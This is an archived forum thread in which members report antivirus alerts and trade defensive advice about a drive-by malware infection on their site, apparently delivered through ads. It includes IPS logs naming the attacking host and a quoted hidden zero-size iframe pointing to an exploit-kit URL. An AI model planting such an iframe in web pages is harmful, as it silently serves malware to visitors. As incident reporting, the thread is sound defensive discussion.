Jump to content

Website Infection? [Resolved]

Slammer64

By Slammer64,
in General Discussion

Recommended Posts

Rogue_Kitsune

Rogue_Kitsune

Posted
Posted

Using Norton Internet Security, and I'm getting the same warnings. Also, I'm running Firefox 17.0.1, with Adblock Plus 2.2.1; the ads aren't displayed, but it seems that didn't do anything to stop the intrusion attempt.

 

Additionally, I'm no expert, but, if it'd be of any help to the admins... Here's the logs from my system.

 

 

 

Category: Intrusion Prevention

Date & Time: 2012-12-11 20:38:58

 

Risk: High

 

Activity: An intrusion attempt by fg34df.ipq.co was blocked.

 

Status: Blocked

 

Recommended Action: No Action Required

 

IPS Alert Name: Web Attack: Exploit Toolkit Website 5

 

Default Action: No Action Required

 

Action Taken: No Action Required

 

Attacking Computer: "fg34df.ipq.co (178.162.132.202, 34511)"

 

Attacker URL: fg34df.ipq.co:34511/t/9cf02f7aec1af4ea55a734c7074d4e91

 

Source Address: 178.162.132.202 (178.162.132.202)

 

Traffic Description: "TCP, Port 34511"

 

 

Network traffic from fg34df.ipq.co:34511/t/9cf02f7aec1af4ea55a734c7074d4e91 matches the signature of a known attack. The attack was resulted from \DEVICE\HARDDISKVOLUME1\PROGRAM FILES (X86)\MOZILLA FIREFOX\FIREFOX.EXE.

 

 

 

 

 

Category: Intrusion Prevention

 

Date & Time: 2012-12-11 20:38:58

 

Risk: High

 

Activity: An intrusion attempt by fg34df.ipq.co was blocked.

 

Status: Blocked

 

Recommended Action: No Action Required

 

IPS Alert Name: Web Attack: Malicious Toolkit Website 9

 

Default Action: No Action Required

 

Action Taken: No Action Required

 

Attacking Computer: "fg34df.ipq.co (178.162.132.202, 34511)"

 

Attacker URL: fg34df.ipq.co:34511/t/9cf02f7aec1af4ea55a734c7074d4e91

 

Source Address: 178.162.132.202 (178.162.132.202)

 

Traffic Description: "TCP, Port 34511"

 

 

Network traffic from fg34df.ipq.co:34511/t/9cf02f7aec1af4ea55a734c7074d4e91 matches the signature of a known attack. The attack was resulted from \DEVICE\HARDDISKVOLUME1\PROGRAM FILES (X86)\MOZILLA FIREFOX\FIREFOX.EXE.

 

 

 

Also: It is -not- asking me to run Java. However, I don't know if that is because it blocked it automatically, if I manually blocked it at some point in the past...or if I allowed it previously, and it still had that saved. >>

 

Also also - I'm not getting warnings on every page, but that likely is due to my antivirus - there's an entry in my security history stating that it automatically blocked the IP address 178.162.132.202 for half an hour - it looks, to me at least, like that is where the attacks are originating from.

bjornk

bjornk

Posted
Posted

I did allow Java to run and got infected with a trojan. Search for these two files on your system drive: dettarisatqo.exe, 1JFUWEIF.EXE or any other exe or dll that's created/modified today. Also, take a look at the registry and start up programs and check if there's anything unusual that's set to run at start up.

 

I use Chrome with AdBlock and MS Security Essentials (which is apparently nothing but a piece of shit) and still got infected.

 

Also, download and run PeerBlock to prevent the trojan from accessing wherever it tries to contact, and also check if there's any suspicious connection activity.

PsychoMachina

PsychoMachina

Posted
Posted

IPQ.CO is the "tinyurl of the DNS world".

 

http://johnleach.co.uk/words/646/ipq-co-intstant-dns-records

 

Probably attackers are using their service to send malicious adverts, I guess with IFRAME scripts to deliver malware.

 

Also found some reports on ipq.co.

 

http://www.avgthreatlabs.com/sitereports/domain/ipq.co

http://siteadvisor.es/sites/ipq.co/msgpage

http://www.net-security.org/malware_news.php?id=1657

El Sparrow

El Sparrow

Posted
Posted

Time of Alert - Every time I load a page on this site O_O (Think it started yesterday, but I might not have been paying attention... it's also possible that I just hadn't visited the site since the offending dealie turned up.)

The page you encountered it on - see above

The name/type of the virus - "exploit nuclear exploit kit (type 1945)"

 

Checked the page sources, and it's the src of the first iframe in the header that's being reported.

Sarnaath

Sarnaath

Posted
Posted

- Time of Alert: today, every page I've read on LL so far.

- The page you encountered it on: see above.

- The name of the virus/Virus type: see below

Detection log from Kaspersky:

 

Firefox fg34df.ipq

Detected: HEUR:Trojan.Script.Generic

hxxp://fg34df.ipq.co:34511/t/9cf02f7aec1af4ea55a734c7074d4e91//

 

Putting the url above into Kaspersky's Anti-Banner (which apparently blocks whole websites) settings seems to work. I'm not getting warning messages every LL page load now. edit: modified the url so it wasn't clickable.

legit1337

legit1337

Posted
Posted

Getting warnings from norton, it's stomping it but there's definitely a rootkit coming from somewhere.

 

Happens occasionally when I switch a page or come to the site.

 

I think it may be malicious code in some of the ads.

 

I have the IP address of where the attack originated.

 

[attachment=20020]

Slammer64

Slammer64

Posted
  • Author
Posted

Thank you Ashal. And I wish to apologize to my fellow board members if I seemed a touch grumpy, not to make excuses but I've been fighting with a Asterisk server that didn't want to do the right thing, had to break out my baseball bat...

legit1337

legit1337

Posted
Posted

Thanks ashal.

 

Whatever loss of safety that I had felt by this attack, has been restored by your timely response.

 

EDIT: I'm deleting my earlier attachment... I realized I probably shouldn't leave pictures of how my antivirus is configured along with my IP address just laying around.

El Sparrow

El Sparrow

Posted
Posted

Was gone, but it seems to be back, I've had a couple of alerts in the last half hour. Same type, similar location - src of the first iframe in the body, line 80.

Ark of Truth

Ark of Truth

Posted
Posted

Well our problems just got worse and we have now been reported as a attack site. This needs to be sorted out, we have been pretty much been flagged up everywhere now.

 

post-18568-13597881529123_thumb.jpg

Ark of Truth

Ark of Truth

Posted
Posted

You should be ok with them but you will only be about 95% safe from infection. The image above is only saying that we have been attacked and not currently giving malware warnings.

 

Just be on guard and don't click on any dodgy links. I am creating a guide to help users with this sort of things as I feel it is needed now after recent events. If you want to be really safe have two anti-virus programs.

 

Right now I have a big red strip across my screen and it is not filling me with confidence.

El Sparrow

El Sparrow

Posted
Posted

Which pages?

 

It's on every page I've got open right now, though it's not at line 80 on each page, that was a dumb assumption on my part. The line in question is in the spoiler.

 

iframe width="0" height="0" frameborder="0" src="http://reftuer.ipq.co:34511/t/03a0868382d7f3f5b9776f81ff92f433"

 

sbire

sbire

Posted
Posted

i recieved that malware warning, too.

i hope the best, to keep that forum online.

 

i'll use sandboxie until this incident has been solved.

b3lisario

b3lisario

Posted
Posted

I am getting Chrome warnings.

 

Did a bit of research. As been said previously it's because an iframe embedded in all pages that points to some URL at reftuer.ipq.co. It seems that host is labeled as dangerous by google.

 

Checked that URL and it's not working at the moment, however it may work any time.

I've added *ipq.co* to the adblock settings to prevent the browser to execute stuff from there. That host is the same as the previous attack that I saw in this thread.

 

About the Java popup, just an advice: never allow Java to run from those popups if you are not sure why the popup shows. You can always refresh later and say yes if you find it's harmless.

Archived

This topic is now archived and is closed to further replies.

Go to topic listing

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...